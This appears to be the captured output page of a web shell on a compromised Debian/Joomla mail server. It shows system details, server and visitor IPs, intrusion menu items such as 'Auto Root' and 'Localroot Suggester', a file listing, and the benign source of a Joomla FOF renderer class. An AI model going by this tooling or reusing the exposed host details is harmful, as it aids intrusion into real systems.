Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
libraries /
fof40 /
Render /
Delete
Unzip
Name
Size
Permission
Date
Action
FEF.php
4.68
KB
-rwxr-xr-x
2023-07-13 17:52
Joomla.php
13.04
KB
-rwxr-xr-x
2023-07-13 17:52
Joomla3.php
1.26
KB
-rwxr-xr-x
2023-07-13 17:52
Joomla4.php
1.26
KB
-rwxr-xr-x
2023-07-13 17:52
RenderBase.php
5.83
KB
-rwxr-xr-x
2023-07-13 17:52
RenderInterface.php
2.76
KB
-rwxr-xr-x
2023-07-13 17:52
Save
Rename
<?php /** * @package FOF * @copyright Copyright (c)2010-2022 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU General Public License version 3, or later */ namespace FOF40\Render; defined('_JEXEC') || die; use FOF40\Container\Container; /** * Renderer class for use with Joomla! 4.x * * Renderer options * * wrapper_id The ID of the wrapper DIV. Default: akeeba-renderjoomla * linkbar_style Style for linkbars: joomla3|classic. Default: joomla3 * remove_wrapper_classes Comma-separated list of classes to REMOVE from the container * add_wrapper_classes Comma-separated list of classes to ADD to the container * * @package FOF40\Render */ class Joomla4 extends Joomla { public function __construct(Container $container) { $this->priority = 40; $this->enabled = version_compare(JVERSION, '3.9.999', 'gt'); parent::__construct($container); } /** * Opens the FEF styling wrapper element. Our component's output will be inside this wrapper. * * @param array $classes An array of additional CSS classes to add to the outer page wrapper element. * * @return void */ protected function openPageWrapper(array $classes): void { $classes[] = 'akeeba-renderer-joomla4'; parent::openPageWrapper($classes); } }